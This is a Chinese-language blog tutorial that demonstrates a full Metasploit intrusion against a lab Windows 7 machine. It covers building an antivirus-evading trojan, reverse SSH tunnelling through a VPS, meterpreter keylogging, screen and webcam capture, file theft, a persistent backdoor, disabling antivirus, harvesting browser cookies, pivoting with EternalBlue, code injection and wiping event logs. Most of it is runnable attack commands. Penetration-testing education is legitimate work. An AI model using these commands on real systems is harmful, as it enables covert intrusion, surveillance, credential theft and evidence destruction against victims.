Metasploit

0x00. Metasploit Framework简介

  Metasploit是目前最流行、最强大、最具扩展性的渗透测试平台软件,是笔者最崇拜也最喜欢的工具没有之一,下面我将用msf给大家带来一场盛大的内网渗透体验,别眨眼噢!

image


0x01. 实战操作

环境准备:

1. 靶机win 7   IP=192.168.43.150

2. kali linux   IP=192.168.43.153

3. VPS服务器   IP=xx.xx.xx.xx

实战演示:

1. 先用evil-evasion生成具有一定免杀功能的windows木马,监听地址设成VPS的地址(打码防D),然后将VPS上的2333端口映射到内网kali的2333端口,同时还要修改VPS上的ssh配置,不然别人是连不上VPS的(在实战中自己常常在内网,所以这里介绍一下VPS)

vi /etc/ssh/sshd_config && GatewayPorts:yes

ssh -CfNg -R xx.xx.xx.xx:2333:192.168.43.153:2333 root@xx.xx.xx.xx -p 29402

image

image

2. 启动kali设置msf监听,lport=2333,lhost=192.168.43.153(注意:这里的监听地址是kali的地址,不是VPS的),关于msf的基本操作网上有很多,这里不过多介绍,大家可以参考这个系列文章

[*]如果想要在docker启动持续监听可以用如下命令

set exitonsession false && run -j

image

3. 在win 7 中执行木马

image

4. 接收到meterpreter之后就应该将自己的进程迁移到一个隐蔽的进程中去,防止被查杀,这里笔者迁移到win 7的桌面进程

migrate 1988 && getpid

image

5. 查看当前权限、系统信息,并尝试提权

getuid && sysinfo && getsystem

image

6. 查看网络、路由信息

ifconfig && route

image

image

7. 监视靶机的桌面

run vnc

image

8. 启动键盘监听

keyscan_start && keyscan_dump

image

9. 设置后门,维持权限

run metsvc -A
use exploit/multi/handler
set payload windows/metsvc_bind_tcp

10. 截屏查看靶机当前桌面

screenshot

image

11. 查看当前系统空闲时间

idletime

image

12. 禁用靶机使用键盘鼠标(笔者win 7系统是64位的,不支持这个操作)

uictl disable keyboard

uictl disable mouse

image

13. 查找靶机中重要的敏感文件

search -d c:\\ -f payload.exe

image

14. 指定下载靶机中的文件到本地

dowmload c:\\Users\\root\\Desktop\\payload.exe /root/Desktop

image

15. 上传指定本地文件到靶机中

upload /root/Desktop/hack.jpeg c:\\Users\\root\\Desktop\\payload.exe

image

16. 打开靶机摄像头,win 7虚拟机没有摄像头所以没反应

webcam_snap

image

17. 将靶机3389端口映射到本地3344,这样连接本地3344端口就能连接靶机的远程桌面

portfwd add -l 3344 -p 3389 -r 127.0.0.1


0x02. 后渗透测试

1. 调用post模块查看当前系统可用的提权模块

run post/multi/recon/local_exploit_suggester

image

2. 调用payload模块对靶机进行远程桌面操作

set payload windows/vncinject/reverse_tcp

set viewonly no

image

3. 关掉靶机中的杀软

killav

image

4. 收集靶机浏览器的敏感信息(访问记录、cookie)

run post/windows/gather/enum_ie

image

5. 设置路由转发,扫描内网机器开放的端口(route add 靶机IP 子网掩码 sessions)

route add 92.168.43.150 255.255.255.0 3

use auxiliary/scanner/portscan/tcp

image

6. 扫描一波内网有没有ms17_010漏洞的主机

use auxiliary/scanner/smb/smb_ms17_010

image

7. 笔者扫到win 7就有这个漏洞,然后就愉快的调用exp搞一波

use exploit/windows/smb/ms17_010_eternalblue

image

8.在靶机的指定应用中注入恶意代码

use post/windows/manage/peinjector

9. 功成身退

clearev


0x03. 结语

  msf是真的强大,笔者总结的这些也只算是九牛一毛,大家在平时使用时多总结一定能玩出花儿来!

文章目录
  1. 1. 0x00. Metasploit Framework简介
    1. 1.0.1.   Metasploit是目前最流行、最强大、最具扩展性的渗透测试平台软件,是笔者最崇拜也最喜欢的工具没有之一,下面我将用msf给大家带来一场盛大的内网渗透体验,别眨眼噢!
  • 2. 0x01. 实战操作
  • 3. 环境准备:
    1. 3.0.1. 1. 靶机win 7   IP=192.168.43.150
    2. 3.0.2. 2. kali linux   IP=192.168.43.153
    3. 3.0.3. 3. VPS服务器   IP=xx.xx.xx.xx
  • 4. 实战演示:
    1. 4.1. 1. 先用evil-evasion生成具有一定免杀功能的windows木马,监听地址设成VPS的地址(打码防D),然后将VPS上的2333端口映射到内网kali的2333端口,同时还要修改VPS上的ssh配置,不然别人是连不上VPS的(在实战中自己常常在内网,所以这里介绍一下VPS)
    2. 4.2. 2. 启动kali设置msf监听,lport=2333,lhost=192.168.43.153(注意:这里的监听地址是kali的地址,不是VPS的),关于msf的基本操作网上有很多,这里不过多介绍,大家可以参考这个系列文章
    3. 4.3. 3. 在win 7 中执行木马
    4. 4.4. 4. 接收到meterpreter之后就应该将自己的进程迁移到一个隐蔽的进程中去,防止被查杀,这里笔者迁移到win 7的桌面进程
    5. 4.5. 5. 查看当前权限、系统信息,并尝试提权
    6. 4.6. 6. 查看网络、路由信息
    7. 4.7. 7. 监视靶机的桌面
    8. 4.8. 8. 启动键盘监听
    9. 4.9. 9. 设置后门,维持权限
    10. 4.10. 10. 截屏查看靶机当前桌面
    11. 4.11. 11. 查看当前系统空闲时间
    12. 4.12. 12. 禁用靶机使用键盘鼠标(笔者win 7系统是64位的,不支持这个操作)
    13. 4.13. 13. 查找靶机中重要的敏感文件
    14. 4.14. 14. 指定下载靶机中的文件到本地
    15. 4.15. 15. 上传指定本地文件到靶机中
    16. 4.16. 16. 打开靶机摄像头,win 7虚拟机没有摄像头所以没反应
    17. 4.17. 17. 将靶机3389端口映射到本地3344,这样连接本地3344端口就能连接靶机的远程桌面
  • 0x02. 后渗透测试
    1. 0.1. 1. 调用post模块查看当前系统可用的提权模块
    2. 0.2. 2. 调用payload模块对靶机进行远程桌面操作
    3. 0.3. 3. 关掉靶机中的杀软
    4. 0.4. 4. 收集靶机浏览器的敏感信息(访问记录、cookie)
    5. 0.5. 5. 设置路由转发,扫描内网机器开放的端口(route add 靶机IP 子网掩码 sessions)
    6. 0.6. 6. 扫描一波内网有没有ms17_010漏洞的主机
    7. 0.7. 7. 笔者扫到win 7就有这个漏洞,然后就愉快的调用exp搞一波
    8. 0.8. 8.在靶机的指定应用中注入恶意代码
    9. 0.9. 9. 功成身退
  • 1. 0x03. 结语
    1. 1.0.1.   msf是真的强大,笔者总结的这些也只算是九牛一毛,大家在平时使用时多总结一定能玩出花儿来!
  • |